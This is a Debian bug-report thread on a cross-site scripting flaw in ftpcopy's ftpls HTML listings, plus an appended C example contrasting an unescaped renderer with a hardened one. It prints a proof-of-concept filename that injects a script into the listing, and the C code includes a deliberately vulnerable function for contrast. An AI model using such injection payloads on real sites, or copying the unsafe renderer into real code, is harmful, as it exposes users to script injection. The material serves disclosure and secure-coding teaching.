Bug#607494: ftpcopy: ftpls cross-site scripting when generating HTML listing

2012-02-13 Thread Gerrit Pape
On Fri, Dec 16, 2011 at 11:58:31AM +, Gerrit Pape wrote:
> On Tue, Dec 13, 2011 at 06:01:52PM +0100, Moritz Muehlenhoff wrote:
> > On Sun, Dec 19, 2010 at 03:10:46AM +0100, non customers wrote:
> > > Subject: ftpcopy: ftpls cross-site scripting when generating HTML listing
> > >
> > > The ftpls command has a cross-site scripting (XSS) security bug when
> > > generating HTML listings:
> >
> > Gerrit, what's the status? This bug hasn't seen any action in a year.
>
> Hi Moritz, I completely forgot this report, sorry.  I'll try to take a
> look within the next few days, or, due to Christmas, maybe in the next few weeks.

Hi, I contacted upstream but didn't get a response.  I'm about to remove
the html-output feature from ftpls with an upcoming upload, and am thinking
about eventually removing the package from Debian because upstream is dead.

Regards, Gerrit.



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#607494: ftpcopy: ftpls cross-site scripting when generating HTML listing

2011-12-16 Thread Gerrit Pape
> On Tue, Dec 13, 2011 at 06:01:52PM +0100, Moritz Muehlenhoff wrote:
> > On Sun, Dec 19, 2010 at 03:10:46AM +0100, non customers wrote:
> > > Subject: ftpcopy: ftpls cross-site scripting when generating HTML listing
> > > Package: ftpcopy
> > > Version: 0.6.7-2
> > > Severity: important
> > > Tags: security
> > >
> > > The ftpls command has a cross-site scripting (XSS) security bug when
> > > generating HTML listings:
> >
> > Gerrit, what's the status? This bug hasn't seen any action in a year.

Hi Moritz, I completely forgot this report, sorry.  I'll try to take a
look within the next few days, or, due to Christmas, maybe in the next few weeks.

Regards, Gerrit.






Bug#607494: ftpcopy: ftpls cross-site scripting when generating HTML listing

2011-12-13 Thread Moritz Muehlenhoff
> On Sun, Dec 19, 2010 at 03:10:46AM +0100, non customers wrote:
> > Subject: ftpcopy: ftpls cross-site scripting when generating HTML listing
> > Package: ftpcopy
> > Version: 0.6.7-2
> > Severity: important
> > Tags: security
> >
> > The ftpls command has a cross-site scripting (XSS) security bug when
> > generating HTML listings:

Gerrit, what's the status? This bug hasn't seen any action in a year.

Cheers,
Moritz






Bug#607494: ftpcopy: ftpls cross-site scripting when generating HTML listing

2010-12-18 Thread non customers
Subject: ftpcopy: ftpls cross-site scripting when generating HTML listing
Package: ftpcopy
Version: 0.6.7-2
Severity: important
Tags: security

The ftpls command has a cross-site scripting (XSS) security bug when
generating HTML listings:

$ ls -al /srv/ftp
total 12
drwxr-xr-x 2 root ftp  4096 Dec 19 02:40 .
drwxr-xr-x 3 root root 4096 Dec 19 02:34 ..
-rw-r--r-- 1 root root    0 Dec 19 02:39 <body onLoad=alert('non-customers crew');>
-rw-r--r-- 1 root root   39 Dec 19 02:40 number2
$ ftpls -h ftp://localhost/
<html><head>
</head><body>
<dl>
<dt><a href="ftp://localhost/<body onLoad=alert('non-customers crew');>"><body onLoad=alert('non-customers crew');></a><br>
<dd> last modified 2010-12-19 02:39:00,    0B
<dt><a href="ftp://localhost/number2">number2</a><br>
<dd> last modified 2010-12-19 02:40:00,   39B
</dl></body></html>
$

-- System Information:
Debian Release: squeeze/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages ftpcopy depends on:
ii  libc6 2.11.2-7   Embedded GNU C Library: Shared lib

ftpcopy recommends no packages.

ftpcopy suggests no packages.

-- no debconf information

-- 
non-customers crew | http://rock-madrid.com/


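The report above shows the filename pasted verbatim into the HTML listing, both inside the href attribute and as the link text, which is exactly what lets a crafted name inject markup. As an added example, not ftpcopy's or ftpls's own code, the C below renders one listing entry two ways: a naive concatenation that reproduces the problem, and a hardened version that percent-encodes the name as a path segment for the href and HTML-escapes both the attribute value and the visible text. The function names, the small growable-buffer helper and the sample filename are this example's own (the filename is constructed to match the one in the report).

```c
/* Added example (not ftpcopy/ftpls code): rendering an HTML directory
 * listing entry so that a hostile filename cannot inject markup.
 * render_entry_unsafe()/render_entry_safe() and the sbuf helper are
 * names invented for this example. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Naive rendering in the spirit of the listing in the bug report: the
 * filename goes verbatim into the href and the link text.
 * Returns a malloc'd string, NULL on allocation failure. */
char *render_entry_unsafe(const char *base_url, const char *name)
{
    size_t n = strlen(base_url) + 2 * strlen(name) + 64;
    char *out = malloc(n);
    if (!out) return NULL;
    snprintf(out, n, "<dt><a href=\"%s%s\">%s</a><br>\n", base_url, name, name);
    return out;
}

/* Minimal growable string buffer. */
typedef struct { char *buf; size_t len, cap; } sbuf;

static int sb_put(sbuf *s, const char *src, size_t srclen)
{
    if (s->len + srclen + 1 > s->cap) {
        size_t ncap = s->cap ? s->cap * 2 : 128;
        while (ncap < s->len + srclen + 1) ncap *= 2;
        char *nb = realloc(s->buf, ncap);
        if (!nb) return -1;
        s->buf = nb; s->cap = ncap;
    }
    memcpy(s->buf + s->len, src, srclen);
    s->len += srclen;
    s->buf[s->len] = '\0';
    return 0;
}

/* Escape text for an HTML text node or a double-quoted attribute value. */
static int put_html_escaped(sbuf *s, const char *text)
{
    for (; *text; text++) {
        const char *rep = NULL;
        switch (*text) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        if (rep ? sb_put(s, rep, strlen(rep)) : sb_put(s, text, 1)) return -1;
    }
    return 0;
}

/* Percent-encode one path segment: keep RFC 3986 unreserved bytes,
 * encode everything else ('/' included, so the name stays inside the
 * directory being listed). */
static int put_path_segment(sbuf *s, const char *name)
{
    for (; *name; name++) {
        unsigned char c = (unsigned char)*name;
        if (isalnum(c) || c == '-' || c == '_' || c == '.' || c == '~') {
            if (sb_put(s, (const char *)&c, 1)) return -1;
        } else {
            char hex[4];
            snprintf(hex, sizeof hex, "%%%02X", c);
            if (sb_put(s, hex, 3)) return -1;
        }
    }
    return 0;
}

/* Hardened rendering: href = base URL + percent-encoded segment, then
 * escaped as an attribute value; link text is HTML-escaped.
 * Returns a malloc'd string, NULL on allocation failure. */
char *render_entry_safe(const char *base_url, const char *name)
{
    sbuf href = {0}, out = {0};
    if (sb_put(&href, base_url, strlen(base_url)) || put_path_segment(&href, name))
        goto fail;
    if (sb_put(&out, "<dt><a href=\"", 13) || put_html_escaped(&out, href.buf) ||
        sb_put(&out, "\">", 2) || put_html_escaped(&out, name) ||
        sb_put(&out, "</a><br>\n", 9))
        goto fail;
    free(href.buf);
    return out.buf;
fail:
    free(href.buf);
    free(out.buf);
    return NULL;
}

int main(void)
{
    /* Constructed filename modelled on the one in the bug report. */
    const char *evil = "<body onLoad=alert('non-customers crew');>";
    char *bad = render_entry_unsafe("ftp://localhost/", evil);
    char *good = render_entry_safe("ftp://localhost/", evil);
    printf("unsafe: %s", bad);
    printf("safe:   %s", good);
    free(bad);
    free(good);
    return 0;
}
```

Two separate encodings are needed because the name lands in two different contexts: percent-encoding keeps the filename a single path segment of the URL, and HTML escaping keeps it inert once that URL is placed in an attribute and the name is placed in the text node. Removing only the `<` and `>` would not be enough for the attribute, since a `"` in a name would still terminate the `href` value.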